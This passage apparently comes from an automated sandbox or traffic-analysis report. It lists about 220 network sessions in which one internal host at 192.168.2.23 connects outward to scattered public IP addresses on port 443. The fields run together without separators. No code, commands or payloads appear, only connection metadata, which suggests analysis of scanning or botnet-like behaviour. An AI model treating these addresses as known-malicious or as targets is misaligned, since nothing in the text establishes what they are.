                                        11174192.168.2.2335132176.203.65.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11175192.168.2.234547645.20.171.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11176192.168.2.234023083.57.45.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11177192.168.2.233992220.141.210.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11178192.168.2.2348944198.30.223.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11179192.168.2.235907853.11.243.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11180192.168.2.234362696.44.192.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11181192.168.2.2352226123.15.209.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11182192.168.2.235326475.53.165.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11183192.168.2.2353520179.40.3.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11184192.168.2.2336286121.129.223.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11185192.168.2.234610438.223.112.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11186192.168.2.235330654.246.136.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11187192.168.2.234885040.4.238.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11188192.168.2.2346664181.155.138.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11189192.168.2.2352120125.204.29.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11190192.168.2.235556496.106.190.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11191192.168.2.2352214129.106.198.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11192192.168.2.233685075.91.65.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11193192.168.2.2351598194.74.20.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11194192.168.2.23468642.226.168.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11195192.168.2.2343020138.166.130.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11196192.168.2.2356996165.94.69.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11197192.168.2.235761238.201.67.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11198192.168.2.235971083.3.211.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11199192.168.2.2354450155.189.38.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11200192.168.2.234280461.198.11.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11201192.168.2.2345416190.14.197.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11202192.168.2.2348138151.81.107.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11203192.168.2.2337078179.31.0.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11204192.168.2.2350904164.2.173.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11205192.168.2.235335062.18.245.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11206192.168.2.2336752113.119.199.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11207192.168.2.2346156192.62.2.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11208192.168.2.2340916165.40.108.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11209192.168.2.2333432173.92.105.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11210192.168.2.2355926204.165.26.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11211192.168.2.235574670.211.68.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11212192.168.2.2351206194.95.69.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11213192.168.2.234243679.214.34.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11214192.168.2.2339792181.238.160.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11215192.168.2.233948666.182.65.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11216192.168.2.2350878223.125.25.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11217192.168.2.2335280122.6.195.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11218192.168.2.2339530183.136.224.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11219192.168.2.23348065.213.73.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11220192.168.2.2358426183.119.91.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11221192.168.2.2355454135.143.60.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11222192.168.2.2359054178.29.228.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11223192.168.2.235541062.236.9.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11224192.168.2.2346566210.177.64.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11225192.168.2.235591651.146.16.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11226192.168.2.2352350139.55.187.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11227192.168.2.2348784133.209.187.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11228192.168.2.23387249.200.14.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11229192.168.2.2358812128.10.215.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11230192.168.2.23347129.60.182.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11231192.168.2.2345490183.230.138.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11232192.168.2.2355572219.120.215.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11233192.168.2.2356448124.4.179.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11234192.168.2.2341206117.139.50.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11235192.168.2.235540427.206.182.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11236192.168.2.2343970184.91.204.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11237192.168.2.235301486.226.217.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11238192.168.2.2347882160.81.201.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11239192.168.2.2348824209.198.29.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11240192.168.2.2341468219.9.42.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11241192.168.2.2346760111.173.184.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11242192.168.2.235021243.91.137.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11243192.168.2.235377680.6.109.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11244192.168.2.234116069.144.29.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11245192.168.2.2343368198.20.213.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11246192.168.2.2349710177.147.112.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11247192.168.2.2354862100.62.187.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11248192.168.2.2337926142.115.157.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11249192.168.2.234366292.149.143.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11250192.168.2.233950279.180.208.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11251192.168.2.235467413.129.204.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11252192.168.2.2352546200.4.210.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11253192.168.2.233688667.102.152.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11254192.168.2.235089462.200.90.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11255192.168.2.2340014103.177.63.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11256192.168.2.235264698.14.128.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11257192.168.2.2345456111.162.187.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11258192.168.2.2337308101.159.13.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11259192.168.2.2352562123.210.204.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11260192.168.2.2350062184.243.102.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11261192.168.2.23477029.248.232.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11262192.168.2.234891657.2.140.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11263192.168.2.2358884143.222.45.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11264192.168.2.2333702114.137.77.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11265192.168.2.2336648152.46.75.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11266192.168.2.235087241.127.150.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11267192.168.2.2349050164.246.168.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11268192.168.2.233668685.169.240.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11269192.168.2.2359424191.218.20.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11270192.168.2.234547846.187.96.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11271192.168.2.2353948139.9.76.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11272192.168.2.234075223.131.23.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11273192.168.2.2358592105.102.176.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11274192.168.2.2343558157.248.98.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11275192.168.2.235722840.131.184.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11276192.168.2.235858077.75.13.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11277192.168.2.2343690186.230.169.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11278192.168.2.2346896180.228.229.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11279192.168.2.23544389.235.61.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11280192.168.2.235012217.166.97.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11281192.168.2.2354718140.69.155.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11282192.168.2.2359698177.228.218.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11283192.168.2.235540247.255.160.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11284192.168.2.2360184105.91.255.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11285192.168.2.2342624174.240.66.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11286192.168.2.233459874.27.118.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11287192.168.2.2339688147.201.116.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11288192.168.2.234752042.183.25.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11289192.168.2.2340646131.4.30.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11290192.168.2.235503676.190.228.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11291192.168.2.2360874179.4.44.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11292192.168.2.2346950144.122.112.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11293192.168.2.2359230219.151.166.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11294192.168.2.235145682.132.158.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11295192.168.2.2337332200.176.158.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11296192.168.2.2356600130.155.173.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11297192.168.2.234141647.55.125.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11298192.168.2.235817074.110.179.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11299192.168.2.2339628141.13.6.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11300192.168.2.235229497.197.120.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11301192.168.2.2337492197.229.74.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11302192.168.2.2335954190.176.66.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11303192.168.2.2333704160.192.20.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11304192.168.2.2345778186.125.89.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11305192.168.2.2352204192.5.182.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11306192.168.2.2344382190.236.50.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11307192.168.2.2350440170.120.244.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11308192.168.2.234858239.251.223.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11309192.168.2.2347420129.233.86.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11310192.168.2.236043077.223.176.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11311192.168.2.2333906162.231.147.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11312192.168.2.2342372132.230.18.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11313192.168.2.235381465.188.184.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11314192.168.2.2349492117.176.191.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11315192.168.2.2356690105.119.217.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11316192.168.2.2359526110.50.54.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11317192.168.2.2357456121.160.81.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11318192.168.2.233878883.93.192.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11319192.168.2.2354678112.41.213.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11320192.168.2.234918672.193.83.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11321192.168.2.234758048.40.158.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11322192.168.2.2346032202.207.62.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11323192.168.2.2357876108.82.164.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11324192.168.2.234600218.27.12.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11325192.168.2.2358826107.70.87.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11326192.168.2.235232496.123.35.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11327192.168.2.2346840187.210.229.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11328192.168.2.2347652209.202.87.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11329192.168.2.234168689.75.172.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11330192.168.2.236043487.178.152.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11331192.168.2.2359194133.59.169.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11332192.168.2.233914866.2.190.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11333192.168.2.235599832.112.138.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11334192.168.2.234164065.8.191.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11335192.168.2.233753887.251.159.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11336192.168.2.2346654136.105.207.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11337192.168.2.23505282.95.98.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11338192.168.2.233328270.11.127.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11339192.168.2.233985477.80.76.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11340192.168.2.2359624114.252.248.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11341192.168.2.2350440107.148.156.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11342192.168.2.235321493.255.161.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11343192.168.2.2345672144.47.154.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11344192.168.2.23460484.185.112.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11345192.168.2.2333762152.106.77.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11346192.168.2.2349388210.250.3.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11347192.168.2.234317052.212.168.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11348192.168.2.235142224.35.92.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11349192.168.2.23594301.172.100.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11350192.168.2.2345532156.205.137.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11351192.168.2.2345542138.186.45.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11352192.168.2.2345488165.188.178.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11353192.168.2.2345080193.154.152.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11354192.168.2.2349280203.27.253.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11355192.168.2.2350234104.190.229.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11356192.168.2.2335196194.62.231.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11357192.168.2.2338248112.118.14.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11358192.168.2.234001697.137.162.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11359192.168.2.233714670.191.230.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11360192.168.2.2343250189.110.43.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11361192.168.2.2351818218.159.136.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11362192.168.2.2348128163.49.13.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11363192.168.2.234131498.58.77.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11364192.168.2.2335254151.30.78.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11365192.168.2.2354902113.61.190.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11366192.168.2.235111650.150.43.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11367192.168.2.2336034104.149.49.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11368192.168.2.2359664201.22.242.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11369192.168.2.2344316199.128.165.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11370192.168.2.2334558121.22.132.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11371192.168.2.2341078142.222.225.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11372192.168.2.2360010141.36.71.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11373192.168.2.2348518105.208.254.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11374192.168.2.2345224132.112.21.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11375192.168.2.234656461.191.103.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11376192.168.2.234585488.102.42.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11377192.168.2.233293278.103.201.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11378192.168.2.234196474.99.10.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11379192.168.2.2355728119.187.156.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11380192.168.2.2342152137.98.44.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11381192.168.2.233465296.42.254.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11382192.168.2.2346782115.78.83.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11383192.168.2.235971480.21.5.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11384192.168.2.2341974132.65.108.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11385192.168.2.23413245.181.192.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11386192.168.2.233457051.146.70.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11387192.168.2.235683249.207.15.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11388192.168.2.2360000209.80.44.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11389192.168.2.2359800104.141.12.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11390192.168.2.2335904144.38.178.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11391192.168.2.2359328132.63.211.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11392192.168.2.234321679.133.218.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11393192.168.2.2357652187.237.193.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11394192.168.2.2346812111.250.31.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11395192.168.2.2340770160.252.67.87443
                                        TimestampBytes transferredDirectionData


